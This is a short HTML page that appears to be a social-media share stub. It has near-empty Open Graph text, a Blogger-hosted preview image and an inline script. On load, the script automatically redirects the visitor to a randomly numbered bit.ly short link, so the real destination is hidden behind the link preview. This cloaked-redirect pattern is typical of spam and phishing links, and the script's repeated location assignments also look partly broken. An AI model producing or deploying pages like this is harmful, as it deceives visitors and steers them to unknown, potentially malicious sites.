<meta property="og:title" content=" ..">
<meta property="og:description" content="
                               

....

">                    
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="
https://blogger.googleusercontent.com/img/a/AVvXsEiMnM5iqW-cOvT6Y42SbbqNJNZor2h8rNAY9rMnT_JRmrADGs-b1VKV1-vPvkCASuwpE-0LDOt2yxN_6rULHI5pZf_Eyw-K1VPEh72CBnibRV24tSa24oadrDglrvuLOVcISCPATu4-L-MFt9VjdmqbdksTsDT42yspdJ4hiUmszdqP3wYeRNOLjC5XXg=s16000
">                             
<script type = "text/javascript">
function reDirect() {
a = location.href = "bit.ly/";
b = location.href = "pon";
c = location.href = "pona";
d = Math.ceil(Math.random() * 24);
a = "https://" + a + b + c + d ;
window.location = a
}
reDirect();
</script>
